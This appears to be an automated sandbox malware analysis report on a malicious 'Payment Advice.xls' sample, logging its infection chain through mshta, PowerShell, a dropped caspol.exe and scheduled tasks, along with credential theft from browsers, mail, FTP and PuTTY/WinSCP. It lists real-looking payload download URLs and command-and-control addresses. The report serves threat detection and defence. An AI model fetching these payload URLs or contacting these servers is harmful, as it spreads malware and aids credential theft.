                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: caspol.exe PID: 3888, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rrwscqkDSNwLK.exe PID: 3576, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: caspol.exe PID: 4076, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000012.00000002.637368812.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: caspol.exe PID: 2596, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                    Source: C:\Users\user\AppData\Roaming\caspol.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                    Source: C:\Users\user\AppData\Roaming\caspol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: PopPassword28_2_0040D069
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exeCode function: SmtpPassword28_2_0040D069
                    Source: Yara matchFile source: 28.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.caspol.exe.3529c50.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.caspol.exe.350fc30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.494317016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.470705091.0000000002410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.471306771.000000000350F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.471306771.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000015.00000002.500711423.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting
                    Valid Accounts13
                    Exploitation for Client Execution
                    1
                    Scripting
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services1
                    Archive Collected Data
                    15
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter
                    1
                    DLL Side-Loading
                    111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    2
                    Credentials in Registry
                    14
                    System Information Discovery
                    Remote Desktop Protocol1
                    Browser Session Hijacking
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    31
                    Obfuscated Files or Information
                    Security Account Manager2
                    Security Software Discovery
                    SMB/Windows Admin Shares2
                    Data from Local System
                    4
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts3
                    PowerShell
                    Login HookLogin Hook1
                    Install Root Certificate
                    NTDS1
                    Process Discovery
                    Distributed Component Object Model11
                    Email Collection
                    125
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing
                    LSA Secrets31
                    Virtualization/Sandbox Evasion
                    SSH1
                    Clipboard Data
                    Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading
                    DCSync1
                    Remote System Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                    Virtualization/Sandbox Evasion
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                    Process Injection
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1559095 Sample: Payment Advice.xls Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 119 Suricata IDS alerts for network traffic 2->119 121 Found malware configuration 2->121 123 Malicious sample detected (through community Yara rule) 2->123 125 19 other signatures 2->125 9 EXCEL.EXE 57 53 2->9         started        14 taskeng.exe 2->14         started        process3 dnsIp4 103 192.3.243.136, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 9->103 105 provit.uk 198.244.140.41, 443, 49163, 49165 RIDLEYSD-NETUS United States 9->105 85 C:\Users\user\...\Payment Advice.xls (copy), Composite 9->85 dropped 87 C:\Users\user\...\~DF6CCF4596F2406470.TMP, Composite 9->87 dropped 89 greetingwithgreatt...sgivenmeback[1].hta, HTML 9->89 dropped 147 Microsoft Office drops suspicious files 9->147 16 mshta.exe 10 9->16         started        20 mshta.exe 9->20         started        22 AcroRd32.exe 9->22         started        24 rrwscqkDSNwLK.exe 14->24         started        file5 signatures6 process7 dnsIp8 97 provit.uk 16->97 107 Suspicious powershell command line found 16->107 109 PowerShell case anomaly found 16->109 26 powershell.exe 23 16->26         started        99 provit.uk 20->99 30 powershell.exe 20->30         started        111 Antivirus detection for dropped file 24->111 113 Tries to steal Mail credentials (via file registry) 24->113 115 Machine Learning detection for dropped file 24->115 117 2 other signatures 24->117 32 powershell.exe 24->32         started        34 powershell.exe 24->34         started        36 schtasks.exe 24->36         started        38 rrwscqkDSNwLK.exe 24->38         started        signatures9 process10 file11 91 C:\Users\user\AppData\Roaming\caspol.exe, PE32 26->91 dropped 93 C:\Users\user\AppData\Local\...\caspol[1].exe, PE32 26->93 dropped 95 C:\Users\user\AppData\...\i4ik0bio.cmdline, Unicode 26->95 dropped 149 Powershell drops PE file 26->149 40 caspol.exe 5 26->40         started        44 powershell.exe 4 26->44         started        46 csc.exe 2 26->46         started        48 caspol.exe 30->48         started        50 csc.exe 30->50         started        52 powershell.exe 30->52         started        signatures12 process13 file14 77 C:\Users\user\AppData\...\rrwscqkDSNwLK.exe, PE32 40->77 dropped 79 C:\Users\user\AppData\Local\...\tmpAAE0.tmp, XML 40->79 dropped 135 Antivirus detection for dropped file 40->135 137 Machine Learning detection for dropped file 40->137 139 Uses schtasks.exe or at.exe to add and modify task schedules 40->139 54 caspol.exe 40->54         started        59 powershell.exe 4 40->59         started        61 powershell.exe 40->61         started        63 schtasks.exe 40->63         started        141 Installs new ROOT certificates 44->141 81 C:\Users\user\AppData\Local\...\i4ik0bio.dll, PE32 46->81 dropped 65 cvtres.exe 46->65         started        143 Adds a directory exclusion to Windows Defender 48->143 145 Injects a PE file into a foreign processes 48->145 67 powershell.exe 48->67         started        69 powershell.exe 48->69         started        73 2 other processes 48->73 83 C:\Users\user\AppData\Local\...\zpwvvpvf.dll, PE32 50->83 dropped 71 cvtres.exe 50->71         started        signatures15 process16 dnsIp17 101 94.156.177.41, 49168, 49169, 49170 NET1-ASBG Bulgaria 54->101 75 C:\Users\user\AppData\...\5879F5.exe (copy), PE32 54->75 dropped 127 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 54->127 129 Tries to steal Mail credentials (via file / registry access) 54->129 131 Tries to harvest and steal ftp login credentials 54->131 133 Tries to harvest and steal browser information (history, passwords, etc) 54->133 file18 signatures19

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Payment Advice.xls21%ReversingLabsWin32.Exploit.CVE-2017-0199
                    Payment Advice.xls25%VirustotalBrowse
                    Payment Advice.xls100%AviraTR/AVI.Agent.xoswb
                    Payment Advice.xls100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe100%AviraHEUR/AGEN.1306899
                    C:\Users\user\AppData\Local\Temp\~DF6CCF4596F2406470.TMP100%AviraTR/AVI.Agent.xoswb
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe100%AviraHEUR/AGEN.1306899
                    C:\Users\user\AppData\Roaming\caspol.exe100%AviraHEUR/AGEN.1306899
                    C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\caspol.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://crl.entrust.n?0%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htavf0%Avira URL Cloudsafe
                    http://192.3.243.136/0%Avira URL Cloudsafe
                    https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.hta0%Avira URL Cloudsafe
                    94.156.177.41/simple/five/fre.php0%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta0%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..0%Avira URL Cloudsafe
                    https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion/k0%Avira URL Cloudsafe
                    https://provit.uk/~0%Avira URL Cloudsafe
                    https://provit.uk/0%Avira URL Cloudsafe
                    http://192.3.243.136/55/caspol.exe0%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htadf0%Avira URL Cloudsafe
                    http://192.3.243.136/55/caspol.e0%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaZf0%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC:0%Avira URL Cloudsafe
                    https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion20%Avira URL Cloudsafe
                    http://192.3.243.136/55/caspol.exep0%Avira URL Cloudsafe
                    https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionvc0%Avira URL Cloudsafe
                    https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion0k0%Avira URL Cloudsafe
                    https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion0%Avira URL Cloudsafe
                    https://provit.uk/J0%Avira URL Cloudsafe
                    http://94.156.177.41/simple/five/fre.php0%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaV80%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta380%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta=80%Avira URL Cloudsafe
                    https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionket0%Avira URL Cloudsafe
                    https://provit.uk/:0%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaHf0%Avira URL Cloudsafe
                    http://192.3.243.136/55/caspol.exe60%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta$10%Avira URL Cloudsafe
                    https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion?0%Avira URL Cloudsafe
                    http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaht0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    provit.uk
                    198.244.140.41
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htatrue
                      • Avira URL Cloud: safe
                      unknown
                      94.156.177.41/simple/five/fre.phptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://192.3.243.136/55/caspol.exetrue
                      • Avira URL Cloud: safe
                      unknown
                      https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://kbfvzoboss.bid/alien/fre.phpfalse
                        high
                        http://alphastand.top/alien/fre.phpfalse
                          high
                          http://alphastand.win/alien/fre.phpfalse
                            high
                            http://alphastand.trade/alien/fre.phpfalse
                              high
                              http://94.156.177.41/simple/five/fre.phptrue
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://192.3.243.136/mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.htamshta.exe, 00000004.00000002.432158239.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
